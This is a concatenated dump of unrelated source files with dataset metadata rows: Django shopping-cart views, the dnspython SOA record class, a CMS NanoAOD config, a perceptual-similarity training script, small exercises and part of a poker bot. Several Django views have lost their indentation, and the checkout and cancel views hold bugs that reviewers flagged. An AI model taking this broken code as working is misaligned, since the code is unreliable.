    # Count the user's cart rows for the badge shown in the template.
    count=0
    data1 = Cart.objects.filter(user_id=request.user.id)
    for i in data1:
        count+=1
    return render(request,'html/addcart.html',{'b':c,'count':count,'data1':data1})
def cartdetails(request):
    """Show the current user's cart with a per-row amount (quantity * unit
    price) plus the row count and grand total."""
    c=Cart.objects.filter(user_id=request.user.id)
    sum=0     # NOTE: shadows the builtin sum()
    count=0
    amount=1
    for i in c:
        amount=i.qunatity*i.veg.price
        count=count+1
        sum=sum+amount
        # Stash the computed amount on the in-memory row for the template.
        i.amount=amount
    return render(request,'html/cartdetails.html',{'sum':sum,'count':count,'cart':c})
def placeorder(request):
c=Cart.objects.filter(user_id=request.user.id)
sum=0
count=0
for i in c:
count=count+1
sum=sum+i.veg.price
return render(request,'html/placeorder.html',{'sum':sum,'count':count,'cart':c})
@login_required
def item(request):
t = Vegpro.objects.filter(a_id=request.user.id)
if request.method == "POST":
s = Vegfr(request.POST,request.FILES)
if s.is_valid():
r = s.save(commit=False)
r.a_id = request.user.id
r.save()
return redirect('/')
s=Vegfr()
return render(request,'html/item.html',{'a':s,'e':t})
def msg(request):
c=Cart.objects.filter(user_id=request.user.id)
sum=0
count=0
for i in c:
count=count+1
sum=sum+i.veg.price
return render(request,'html/message.html',{'count':count})
def msg1(request):
c=Cart.objects.filter(user_id=request.user.id)
sum=0
count=0
for i in c:
count=count+1
sum=sum+i.veg.price
return render(request,'html/message1.html',{'count':count})
def msg2(request):
return render(request,'html/msg2.html')
def myorders(request):
my=Myorders.objects.filter(user_id=request.user.id)
sum=0
count=0
for i in my:
count=count+1
sum=sum+i.price
return render(request,'html/myorders.html',{'sum':sum,'my':my})
def checkout(request):
    """POST: confirm the order -- email the user, copy cart rows into
    Myorders/Orders, decrement stock, and clear the cart.
    GET: just render the place-order page."""
    c=Cart.objects.filter(user_id=request.user.id)
    if request.method=="POST":
        m=request.user.email
        receiver=m
        l=[]
        x=[]   # attachment list -- never populated, so the attach loop below is dead code
        sum=0  # NOTE: shadows the builtin sum()
        for i in c:
            sum=sum+i.veg.price*i.qunatity
            l.append(i.veg.item_name)
        message='Ordered items ::\n'+' ,'.join(l)+'\n'+ 'will be delivered within 10 days.\n'+'Total amount paid: Rs.'+str(sum)+'\n'+'THANK YOU for Shopping!! \n'
        subject='Order confirmed'
        st=settings.EMAIL_HOST_USER
        if c:
            # NOTE(review): send_mail() returns an int; calling .attach()/.send()
            # on it would crash if x were ever non-empty -- confirm intent.
            at=send_mail(subject,message,st,[receiver])
            for i in x:
                at.attach(i.name,i.read())
                at.send()
            for i in c:
                sum=sum+i.veg.price   # NOTE(review): re-adds unit prices on top of the emailed total
                a=Myorders(item_name=i.veg.item_name,item_type=i.veg.item_type,price=i.veg.price,user_id=request.user.id,prod=i.veg.a_id)
                a.save()
                b=Orders(item_name=i.veg.item_name,item_type=i.veg.item_type,price=i.veg.price,prod=i.veg.a_id)
                b.save()
                # NOTE(review): queryset.delete() removes *all* of this user's
                # cart rows on the first pass; iteration continues over Django's
                # cached results, and c.delete() is repeated after the loop.
                c.delete()
                he=Vegpro.objects.filter(id=i.veg_id)
                # Inner loop reuses the name "i" (shadows the cart row for the
                # remainder of this iteration body).
                for i in he:
                    i.totalquantity-=1
                    i.save()
            c.delete()
            return redirect('msg')
        # Empty cart: show the "nothing to order" message page.
        return redirect('msg1')
    return render(request,'html/placeorder.html')
def ordercancel(request,si):
    """Cancel Myorders row *si*: on a valid POST, email the user, save the
    cancel form, and show the confirmation page."""
    x=Myorders.objects.get(id=si)
    j=CancelForm(request.POST,instance=x)
    if request.method=="POST":
        if j.is_valid():
            receiver=request.user.email
            sender=settings.EMAIL_HOST_USER
            subject="order cancelled"
            body="your order has been cancelled"
            # NOTE(review): django.core.mail.send_mail's signature is
            # (subject, message, from_email, recipient_list); here *sender* is
            # passed where the subject goes -- confirm the intended arguments.
            send_mail(sender,body,subject,[receiver])
            j.save()
            return redirect('msg2')
            # NOTE(review): everything below this return is unreachable and
            # references undefined names (Product, i) -- apparently leftover
            # code meant to restore stock and delete the order.
            he=Product.objects.filter(id=i.product_id)
            for i in he:
                i.totalquantity+=1
                i.save()
            x.delete()
    j=CancelForm(instance=x)
    return render(request,'html/ordercancel.html',{'prod':j})
| [
"guna11priya@gmail.com"
] | guna11priya@gmail.com |
034a7d5e99bd493a04228ed2e4b4f1b71a6ec5c2 | 0cc4eb3cb54f8394c127ace62d3108fdb5230c85 | /.spack-env/view/lib/python3.7/site-packages/jedi/third_party/typeshed/stdlib/2and3/profile.pyi | df940020d4066a6dc89ae87f2652df920ed8c8b4 | [] | no_license | jacobmerson/spack-develop-env | 5b2d76f58c0b64ae97c64f77a3c4d33a770c71c8 | 5fca20ca343b1a76f05fc635c87f94ed25417d94 | refs/heads/master | 2022-07-04T02:22:50.264727 | 2020-05-06T05:13:50 | 2020-05-06T05:13:50 | 261,657,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 190 | pyi | /lore/mersoj/spack/spack/opt/spack/linux-rhel7-x86_64/gcc-7.3.0/py-jedi-0.17.0-zugnvpgjfmuk5x4rfhhxlsknl2g226yt/lib/python3.7/site-packages/jedi/third_party/typeshed/stdlib/2and3/profile.pyi | [
"mersoj@rpi.edu"
] | mersoj@rpi.edu |
ce3333447ac28a3d89c0757d6ada515e638e5bd2 | 8410bb5a2e8849bb3a554b95ddc713d88f3440c4 | /aws-dev/awsdev9/venv/Lib/site-packages/dns/rdtypes/ANY/SOA.py | aec81cad8ac916e9bc71052ecbc4983cdabbd126 | [
"MIT"
] | permissive | PacktPublishing/-AWS-Certified-Developer---Associate-Certification | ae99b6c1efb30e8fab5b76e3d8c821823a4cd852 | b9838b4e038b42ad1813a296379cbbc40cab6286 | refs/heads/master | 2022-11-03T04:37:49.014335 | 2022-10-31T05:42:19 | 2022-10-31T05:42:19 | 219,964,717 | 13 | 11 | MIT | 2021-06-02T00:57:45 | 2019-11-06T09:54:09 | Python | UTF-8 | Python | false | false | 4,597 | py | # Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
# Copyright (C) 2003-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import struct
import dns.exception
import dns.rdata
import dns.name
class SOA(dns.rdata.Rdata):

    """SOA record
    @ivar mname: the SOA MNAME (master name) field
    @type mname: dns.name.Name object
    @ivar rname: the SOA RNAME (responsible name) field
    @type rname: dns.name.Name object
    @ivar serial: The zone's serial number
    @type serial: int
    @ivar refresh: The zone's refresh value (in seconds)
    @type refresh: int
    @ivar retry: The zone's retry value (in seconds)
    @type retry: int
    @ivar expire: The zone's expiration value (in seconds)
    @type expire: int
    @ivar minimum: The zone's negative caching time (in seconds, called
    "minimum" for historical reasons)
    @type minimum: int
    @see: RFC 1035"""

    __slots__ = ['mname', 'rname', 'serial', 'refresh', 'retry', 'expire',
                 'minimum']

    def __init__(self, rdclass, rdtype, mname, rname, serial, refresh, retry,
                 expire, minimum):
        # Store the seven RFC 1035 SOA fields on the rdata instance.
        super(SOA, self).__init__(rdclass, rdtype)
        self.mname = mname
        self.rname = rname
        self.serial = serial
        self.refresh = refresh
        self.retry = retry
        self.expire = expire
        self.minimum = minimum

    def to_text(self, origin=None, relativize=True, **kw):
        """Render in zone-file form: 'MNAME RNAME serial refresh retry expire minimum'."""
        mname = self.mname.choose_relativity(origin, relativize)
        rname = self.rname.choose_relativity(origin, relativize)
        return '%s %s %d %d %d %d %d' % (
            mname, rname, self.serial, self.refresh, self.retry,
            self.expire, self.minimum)

    @classmethod
    def from_text(cls, rdclass, rdtype, tok, origin=None, relativize=True):
        """Parse SOA rdata from zone-file tokens: two names, then five integers."""
        mname = tok.get_name()
        rname = tok.get_name()
        mname = mname.choose_relativity(origin, relativize)
        rname = rname.choose_relativity(origin, relativize)
        serial = tok.get_uint32()
        refresh = tok.get_ttl()
        retry = tok.get_ttl()
        expire = tok.get_ttl()
        minimum = tok.get_ttl()
        tok.get_eol()
        return cls(rdclass, rdtype, mname, rname, serial, refresh, retry,
                   expire, minimum)

    def to_wire(self, file, compress=None, origin=None):
        # Wire format: MNAME and RNAME (possibly compressed), followed by five
        # 32-bit big-endian unsigned integers.
        self.mname.to_wire(file, compress, origin)
        self.rname.to_wire(file, compress, origin)
        five_ints = struct.pack('!IIIII', self.serial, self.refresh,
                                self.retry, self.expire, self.minimum)
        file.write(five_ints)

    def to_digestable(self, origin=None):
        # Canonical (uncompressed) form used when computing digests.
        return self.mname.to_digestable(origin) + \
            self.rname.to_digestable(origin) + \
            struct.pack('!IIIII', self.serial, self.refresh,
                        self.retry, self.expire, self.minimum)

    @classmethod
    def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin=None):
        # Read the two (possibly compressed) names, shrinking rdlen as we go.
        (mname, cused) = dns.name.from_wire(wire[: current + rdlen], current)
        current += cused
        rdlen -= cused
        (rname, cused) = dns.name.from_wire(wire[: current + rdlen], current)
        current += cused
        rdlen -= cused
        # Exactly 20 bytes (five 32-bit integers) must remain.
        if rdlen != 20:
            raise dns.exception.FormError
        five_ints = struct.unpack('!IIIII',
                                  wire[current: current + rdlen])
        if origin is not None:
            mname = mname.relativize(origin)
            rname = rname.relativize(origin)
        return cls(rdclass, rdtype, mname, rname,
                   five_ints[0], five_ints[1], five_ints[2], five_ints[3],
                   five_ints[4])

    def choose_relativity(self, origin=None, relativize=True):
        """Relativize (or de-relativize) both embedded names in place."""
        self.mname = self.mname.choose_relativity(origin, relativize)
        self.rname = self.rname.choose_relativity(origin, relativize)
| [
"sonalis@packtpub.com"
] | sonalis@packtpub.com |
f2a79e14c8e1f3123f6c1980abd11fd2deeb6313 | acfc74f4cd6da2f89775a7c5fba196b441488aa7 | /nsd-term-project/pymodule/agent.py | 434421b39a185fb84694c62e59d8d993b0d3be3b | [] | no_license | jptom/study-probablistic-robotics | c76c960a58d253c480ade4f0225e653f6d09c8dd | 1cf1905194218b52e222a87ae1d45aa0d48465f0 | refs/heads/main | 2023-02-11T13:43:23.259239 | 2021-01-10T22:43:22 | 2021-01-10T22:43:22 | 303,395,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 797 | py |
class EstimationAgent(Agent):
def __init__(self, time_interval, nu, omega, estimator):
super().__init__(nu, omega)
self.estimator = estimator
self.time_interval = time_interval
self.prev_nu = 0.0
self.prev_omega = 0.0
def decision(self, observation=None):
self.estimator.motion_update(self.prev_nu, self.prev_omega, self.time_interval)
self.prev_nu, self.prev_omega = self.nu, self.omega
self.estimator.observation_update(observation)
return self.nu, self.omega
def draw(self, ax, elems):
self.estimator.draw(ax, elems)
x, y, t = self.estimator.pose
s = "({:.2f}, {:.2f}, {})".format(x, y, int(t*180/math.pi)%360)
elems.append(ax.text(x, y+0.1, s, fontsize=8))
| [
"noreply@github.com"
] | noreply@github.com |
b379be57824d2fb470bae252805697851fe78582 | 7f770972c8bc279008af04e418d1080c7b122c7a | /DevLab/5.py | 071d49b37590f9fcefd460dcdd4d894e67ceac52 | [] | no_license | thongchaiSH/practice-dev-lab | 5e5f91c5dd36ef12ec8780b1ba805b0b8c3fe8f9 | 32b15c2bdd296dc1fa65dc580290f4a60a4cff47 | refs/heads/main | 2023-02-22T05:37:41.851182 | 2021-01-25T05:32:27 | 2021-01-25T05:32:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 739 | py | '''
คำนวณเกรด
คำอธิบาย
โดยการคำนวณเกรดนั้นจะมีการให้คะแนนตามเกรดแต่ละช่วงเป็น 80- 100 ได้เกรด A , 70 - 79 ได้เกรด B , 60 - 69 ได้เกรด C , 50 - 59 ได้เกรด D และ ต่ำกว่า 50 จะได้เกรด F โดยผู้ใช้จะต้องกรอกเป็นตัวเลขจำนวนเต็มเท่านั้น
'''
def grade(score):
    """Return the letter grade for an integer *score*.

    80-100 -> "A", 70-79 -> "B", 60-69 -> "C", 50-59 -> "D", below 50 -> "F".
    (Scores above 100 fall through to "B", matching the original chain; the
    assignment states input is always a valid integer.)
    """
    if score >= 80 and score <= 100:
        return "A"
    elif score >= 70:
        return "B"
    elif score >= 60:
        return "C"
    elif score >= 50:
        return "D"
    return "F"


if __name__ == "__main__":
    # Read one integer from stdin and print its grade, exactly as before.
    # The __main__ guard keeps input() from running when imported for tests.
    print(grade(int(input())))
| [
"thongchai.sh@gmail.com"
] | thongchai.sh@gmail.com |
2ca6a41f705f6ef795834db9d2bcbec1c4e7da99 | 9d0195aa83cc594a8c61f334b90375961e62d4fe | /JTTest/SL7/CMSSW_10_2_15/src/miniAODJobs600toInf/nano4.py | 1366df4f33cc6ad0c152e7cd8e25ea82efda4cf6 | [] | no_license | rsk146/CMS | 4e49592fc64f6438051544c5de18598db36ed985 | 5f8dab8c59ae556598b9747b52b88205fffc4dbe | refs/heads/master | 2022-12-01T03:57:12.126113 | 2020-08-04T03:29:27 | 2020-08-04T03:29:27 | 284,863,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,363 | py | # Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: nanoAOD_jetToolbox_cff -s NANO --mc --eventcontent NANOAODSIM --datatier NANOAODSIM --no_exec --conditions 102X_upgrade2018_realistic_v19 --era Run2_2018,run2_nanoAOD_102Xv1 --customise_commands=process.add_(cms.Service('InitRootHandlers', EnableIMT = cms.untracked.bool(False))) --customise JMEAnalysis/JetToolbox/nanoAOD_jetToolbox_cff.nanoJTB_customizeMC --filein file:cms/xaastorage/MINIAOD/Xaa_photons/diPhoton/x500_a100/XaaNLOttQED0_BBAR_M-x500_a100_MINIAODSIM_1.root --fileout file:jetToolbox_nano_mc.root
import FWCore.ParameterSet.Config as cms
import files50
from files50 import *
from Configuration.StandardSequences.Eras import eras
process = cms.Process('NANO',eras.Run2_2018,eras.run2_nanoAOD_102Xv1)
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_cff')
process.load('PhysicsTools.NanoAOD.nano_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
# Input source
process.source = cms.Source("PoolSource",
# fileNames = cms.untracked.vstring('file:/cms/xaastorage/MINIAOD/2016/GJets/HT_100to200/GJet_100to200_1.root '),
fileNames = cms.untracked.vstring(A),
secondaryFileNames = cms.untracked.vstring()
)
process.options = cms.untracked.PSet(
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('nanoAOD_jetToolbox_cff nevts:1'),
name = cms.untracked.string('Applications'),
version = cms.untracked.string('$Revision: 1.19 $')
)
# Output definition
process.NANOAODSIMoutput = cms.OutputModule("NanoAODOutputModule",
compressionAlgorithm = cms.untracked.string('LZMA'),
compressionLevel = cms.untracked.int32(9),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('NANOAODSIM'),
filterName = cms.untracked.string('')
),
fileName = cms.untracked.string('file:jetToolbox_nano_mc_2018GJetsHT600toInf_50.root'),
outputCommands = process.NANOAODSIMEventContent.outputCommands
)
# Additional output definition
# Other statements
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, '102X_upgrade2018_realistic_v19', '')
# Path and EndPath definitions
process.nanoAOD_step = cms.Path(process.nanoSequenceMC)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.NANOAODSIMoutput_step = cms.EndPath(process.NANOAODSIMoutput)
# Schedule definition
process.schedule = cms.Schedule(process.nanoAOD_step,process.endjob_step,process.NANOAODSIMoutput_step)
from PhysicsTools.PatAlgos.tools.helpers import associatePatAlgosToolsTask
associatePatAlgosToolsTask(process)
# customisation of the process.
# Automatic addition of the customisation function from PhysicsTools.NanoAOD.nano_cff
from PhysicsTools.NanoAOD.nano_cff import nanoAOD_customizeMC
#call to customisation function nanoAOD_customizeMC imported from PhysicsTools.NanoAOD.nano_cff
process = nanoAOD_customizeMC(process)
# Automatic addition of the customisation function from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff
from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff import nanoJTB_customizeMC
#call to customisation function nanoJTB_customizeMC imported from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff
process = nanoJTB_customizeMC(process)
# End of customisation functions
# Customisation from command line
process.add_(cms.Service('InitRootHandlers', EnableIMT = cms.untracked.bool(False)))
# Add early deletion of temporary data products to reduce peak memory need
from Configuration.StandardSequences.earlyDeleteSettings_cff import customiseEarlyDelete
process = customiseEarlyDelete(process)
# End adding early deletion
| [
"rsk146@scarletmail.rutgers.edu"
] | rsk146@scarletmail.rutgers.edu |
8bf032498531047a3d1285fdc533adaa25bf826f | 1c71f25108b277a63f2adc48aa30b201fd254a5b | /third_party/PerceptualSimilarity/train.py | 4bff0e07512efa28c0bc4e52a336da8c25f7cbbe | [
"Apache-2.0",
"BSD-2-Clause"
] | permissive | ecmjohnson/lasr | 934c292eff5305325c97ef2e11e5c72b6f4db3c9 | 1d8404232d2e51c330bdf83416343eda0290bcc0 | refs/heads/main | 2023-07-08T06:44:18.911430 | 2021-08-09T20:35:09 | 2021-08-09T20:35:09 | 394,651,253 | 1 | 0 | Apache-2.0 | 2021-08-10T12:47:44 | 2021-08-10T12:47:43 | null | UTF-8 | Python | false | false | 4,956 | py | import torch.backends.cudnn as cudnn
cudnn.benchmark=False
import numpy as np
import time
import os
from models import dist_model as dm
from data import data_loader as dl
import argparse
from util.visualizer import Visualizer
#from IPython import embed
parser = argparse.ArgumentParser()
parser.add_argument('--datasets', type=str, nargs='+', default=['train/traditional','train/cnn','train/mix'], help='datasets to train on: [train/traditional],[train/cnn],[train/mix],[val/traditional],[val/cnn],[val/color],[val/deblur],[val/frameinterp],[val/superres]')
parser.add_argument('--model', type=str, default='net-lin', help='distance model type [net-lin] for linearly calibrated net, [net] for off-the-shelf network, [l2] for euclidean distance, [ssim] for Structured Similarity Image Metric')
parser.add_argument('--net', type=str, default='alex', help='[squeeze], [alex], or [vgg] for network architectures')
parser.add_argument('--batch_size', type=int, default=50, help='batch size to test image patches in')
parser.add_argument('--use_gpu', action='store_true', help='turn on flag to use GPU')
parser.add_argument('--nepoch', type=int, default=5, help='# epochs at base learning rate')
parser.add_argument('--nepoch_decay', type=int, default=5, help='# additional epochs at linearly learning rate')
parser.add_argument('--display_freq', type=int, default=5000, help='frequency (in instances) of showing training results on screen')
parser.add_argument('--print_freq', type=int, default=5000, help='frequency (in instances) of showing training results on console')
parser.add_argument('--save_latest_freq', type=int, default=10000, help='frequency (in instances) of saving the latest results')
parser.add_argument('--save_epoch_freq', type=int, default=1, help='frequency of saving checkpoints at the end of epochs')
parser.add_argument('--display_id', type=int, default=0, help='window id of the visdom display, [0] for no displaying')
parser.add_argument('--display_winsize', type=int, default=256, help='display window size')
parser.add_argument('--display_port', type=int, default=8001, help='visdom display port')
parser.add_argument('--use_html', action='store_true', help='save off html pages')
parser.add_argument('--checkpoints_dir', type=str, default='checkpoints', help='checkpoints directory')
parser.add_argument('--name', type=str, default='tmp', help='directory name for training')
opt = parser.parse_args()
opt.train_plot = True
opt.save_dir = os.path.join(opt.checkpoints_dir,opt.name)
if(not os.path.exists(opt.save_dir)):
os.mkdir(opt.save_dir)
# initialize model
model = dm.DistModel()
model.initialize(model=opt.model,net=opt.net,use_gpu=opt.use_gpu, is_train=True)
# load data from all training sets
data_loader = dl.CreateDataLoader(opt.datasets,dataset_mode='2afc', batch_size=opt.batch_size, serial_batches=False)
dataset = data_loader.load_data()
dataset_size = len(data_loader)
D = len(dataset)
print('Loading %i instances from'%dataset_size,opt.datasets)
visualizer = Visualizer(opt)
total_steps = 0
fid = open(os.path.join(opt.checkpoints_dir,opt.name,'train_log.txt'),'w+')
for epoch in range(1, opt.nepoch + opt.nepoch_decay + 1):
epoch_start_time = time.time()
for i, data in enumerate(dataset):
iter_start_time = time.time()
total_steps += opt.batch_size
epoch_iter = total_steps - dataset_size * (epoch - 1)
model.set_input(data)
model.optimize_parameters()
if total_steps % opt.display_freq == 0:
visualizer.display_current_results(model.get_current_visuals(), epoch)
if total_steps % opt.print_freq == 0:
errors = model.get_current_errors()
t = (time.time()-iter_start_time)/opt.batch_size
t2o = (time.time()-epoch_start_time)/3600.
t2 = t2o*D/(i+.0001)
visualizer.print_current_errors(epoch, epoch_iter, errors, t, t2=t2, t2o=t2o, fid=fid)
for key in errors.keys():
visualizer.plot_current_errors_save(epoch, float(epoch_iter)/dataset_size, opt, errors, keys=[key,], name=key, to_plot=opt.train_plot)
if opt.display_id > 0:
visualizer.plot_current_errors(epoch, float(epoch_iter)/dataset_size, opt, errors)
if total_steps % opt.save_latest_freq == 0:
print('saving the latest model (epoch %d, total_steps %d)' %
(epoch, total_steps))
model.save(opt.save_dir, 'latest')
if epoch % opt.save_epoch_freq == 0:
print('saving the model at the end of epoch %d, iters %d' %
(epoch, total_steps))
model.save(opt.save_dir, 'latest')
model.save(opt.save_dir, epoch)
print('End of epoch %d / %d \t Time Taken: %d sec' %
(epoch, opt.nepoch + opt.nepoch_decay, time.time() - epoch_start_time))
if epoch > opt.nepoch:
model.update_learning_rate(opt.nepoch_decay)
# model.save_done(True)
fid.close()
| [
"deqingsun@google.com"
] | deqingsun@google.com |
c4ecb3d26e7d4d021faf6e0f28580b6d1360efee | e0c81c6117c58be5e0a610ceb24f283bb9a8bafd | /old/pick_panos_for_sliding_window.py | 28503ee6d736f4d628141127727aec615556a670 | [] | no_license | ndenizturhan/sidewalk-cv-assets19 | 0928e65be92e2e2f259a40b9afca91a823d85b1c | dfad62b34c3a6a17ee6906cdecae518732c2bb8c | refs/heads/master | 2022-07-17T06:06:08.629912 | 2020-05-21T18:41:40 | 2020-05-21T18:41:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | import os, csv, random
path_to_db_export = "/mnt/c/Users/gweld/sidewalk/minus_onboard.csv"
num_to_pick = 50
#############################
panos = []
with open(path_to_db_export, 'r') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
panos.append( row[0] )
picked = random.sample(panos, num_to_pick)
for p in picked:
print p | [
"gweld@cs.washington.edu"
] | gweld@cs.washington.edu |
d9bf1f45f8a93985ea6f2e0a18d2ad677c242736 | 444dd650756e29854010e64388f9d92608c2f847 | /PalindromeHW5.py | 224d24dc08819f68250c96be15dd713d14041143 | [] | no_license | Lizzy95/MICP | ae440a4b2f7f6962e9611974a5451b60f0608e32 | 2739ef8de60674a0454fc0c6384e5d74c2a083ea | refs/heads/master | 2021-01-01T16:58:51.436268 | 2017-09-13T16:33:32 | 2017-09-13T16:33:32 | 97,968,453 | 0 | 1 | null | 2017-09-13T16:33:33 | 2017-07-21T16:42:16 | Python | UTF-8 | Python | false | false | 982 | py | class ListNode(object):
def __init__(self, x = None, next = None):
self.val = x
self.next = next
def isPalindrome(head):
try:
findMid = head
mid = head
if head.val == None:
raise Exception('Throw exception')
while findMid and findMid.next:
findMid = findMid.next.next
mid = mid.next
secondPart = []
while mid:
secondPart.append(mid.val)
mid = mid.next
while secondPart:
x = secondPart.pop()
if x != head.val:
return False
head = head.next
return True
except Exception:
raise
test1 = ListNode('a',ListNode('b', ListNode('c', ListNode('c', ListNode('b', ListNode('a'))))))
print isPalindrome(test1)
test1 = ListNode('1',ListNode('1'))
print isPalindrome(test1)
test1 = ListNode('a', ListNode('b',ListNode('1', ListNode('2', ListNode('2', ListNode('1', ListNode('b', ListNode('a'))))))))
print isPalindrome(test1)
#print isPalindrome(ListNode())
| [
"lizzi16.gd95@gmail.com"
] | lizzi16.gd95@gmail.com |
fa37b4c5fdcdb9523555f762cbf4a584c1be99c6 | 736030867c8b57dca68c2252a6890c75163ab6a6 | /attempt.py | fadd250875c5de5404900448b12c040df7cb6580 | [] | no_license | vapte/PokerBots | e66d3dcb61fcb040d0b9a62d3ab938ae86621ad9 | 4ff0d1f540c76c5ba10b96efcee30e60ed4bb20d | refs/heads/master | 2020-12-30T21:46:41.019811 | 2016-07-19T15:47:25 | 2016-07-19T15:47:25 | 46,761,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,014 | py | import itertools as it
import random
import copy
from numpy.random import logistic
import os
import multiprocessing
import time
import tkinter
import pickle
#Skeleton code for Player obtained from MIT PokerBots course website
class Player(object):
values = ['2','3','4','5','6','7','8','9','T','J','Q','K','A'] #ordered lo to hi
handOrder = ['highcard', '1pair', '2pair', '3ofakind', 'straight',
'flush', 'fullhouse', '4ofakind', 'straightflush'] #lo to hi
valuesStr = ''.join(values)
suits = ['d','c','s','h']
fullDeck = list(it.product(values,suits))
for i in range(len(fullDeck)):
hand = fullDeck[i]
fullDeck[i] = hand[0]+hand[1] #tuple>>str
assert(len(fullDeck)==52)
def __init__(self,name): #must set name to name in config.txt
self.hole = []
self.board = []
self.potSize = 0
self.actions = []
self.playerNames = []
self.histories = dict()
self.stackSizes = []
self.potOdds = 0
self.blind = Player.getBlind()
self.blindsLeft = 0
self.EV = 0
self.impliedEV = 0
self.AF, self.AFtype = 0,None
self.name = name
self.stack = 0
self.opponents = dict()
self.numHands = 0
self.winRate = 0
self.gameState = None
self.impliedPotOdds = 0
self.allHistories = []
def run(self, inputSocket):
# Get a file-object for reading packets from the socket.
# Using this ensures that you get exactly one packet per read.
f_in = inputSocket.makefile()
while True:
# Block until the engine sends us a packet.
data = f_in.readline().strip() # If data == None, connection closed.
packetValues = data.split(' ')
print(self.name, data,'\n\n')
word = packetValues[0]
if word=='NEWHAND':
self.newHandUpdate(packetValues)
elif word == "GETACTION":
self.getActionUpdate(packetValues)
self.getActionReponse(packetValues, inputSocket)
elif word == 'HANDOVER':
self.stackSizes = packetValues[1:4]
self.historyUpdate(packetValues,True)
elif word == "REQUESTKEYVALUES":
inputSocket.send(b"FINISH\n")
#update histories and stats
if word == "GETACTION" or word=="HANDOVER":
self.gameStateUpdate(packetValues)
if self.histories!={}:
self.updateAll()
self.conclude(inputSocket)
def conclude(self,inputSocket):
# Clean up the socket.
inputSocket.close()
self.allHistoriesPrint()
#EXPORT allHistories to text file
self.allHistoriesExport()
def updateAll(self):
self.statUpdate()
#opponent attributes update
for opponent in self.opponents:
currOpp = self.opponents[opponent]
currOpp.attrsUpdate(self.__dict__)
#opponent stats update
self.oppUpdate()
def gameStateUpdate(self,packetValues):
for event in packetValues:
if 'FLOP' in event:
self.gameState = 'flop'
elif 'TURN' in event:
self.gameState = 'turn'
elif 'RIVER' in event:
self.gameState = 'river'
def allHistoriesPrint(self):
time.sleep(2)
if self.name=='player1':
print('hi\n\n',self.allHistories,'\n\n')
def allHistoriesExport(self):
fileIndex = int(self.name[-1])+2
Player.writeFile('filename%d.pickle' % fileIndex ,self.allHistories,True)
def newHandUpdate(self, packetValues):
self.boardReset()
self.hole = [packetValues[3],packetValues[4]]
self.playerNames = []
for piece in packetValues[5:-5]:
if not piece.isdigit():
self.playerNames+=[piece]
#need to initialize histories/opponents on first hand
if self.histories == {}:
for player in self.playerNames:
self.histories[player] = []
assert(len(self.playerNames)<=3) #engine allows 3 players max
if self.opponents == {}:
for player in self.playerNames:
if player!=self.name:
self.opponents[player] = Opponent(player,self.__dict__)
self.numHands+=1
self.gameState = 'preflop'
def getActionUpdate(self,packetValues):
self.historyUpdate(packetValues)
#get player actions
self.actions = packetValues[-4:-1]
if self.actions[0].isdigit():
self.actions.pop(0)
#update potSize, board, stacksizes
self.potSize = int(packetValues[1])
numCards = int(packetValues[2])
if numCards > 0:
self.board = packetValues[3:3+numCards]
self.stackSizes = packetValues[3+numCards:6+numCards]
#compute pot odds
for action in self.actions:
if "CALL" in action:
callSize = int(action.split(':')[1])
self.potOdds = callSize/self.potSize
def getActionReponse(self,packetValues,inputSocket):
#run logic and send message
rawBotResponse = self.botLogic()
if rawBotResponse!=None:
response = Player.botResponse(rawBotResponse)
else:
response = Player.botResponse()
inputSocket.send(response)
def botLogic(self): #top level function for bot logic
pass
#override in subclasses
#should return (action, quantity)
#actions = 'check','fold','bet','raise','call'
#quantity is needed for all (0 if check or fold)
def checkReturnVal(self,shouldReturn, actionsDict):
#sometimes the engine let's players spend more than they have...
if shouldReturn[0] in ['call','bet','raise']:
if shouldReturn[1]>self.stack:
if actionsDict.get('check',False):
return ('check',0)
else:
return ('fold',0)
else:
return shouldReturn
else:
return shouldReturn
def actionsParse(self): #parses self.actions
check = fold = False
actionsDict = dict()
minRaise = maxRaise = minBet = maxBet = callSize = None
for value in self.actions:
if 'RAISE' in value:
minRaise = int(value.split(':')[1])
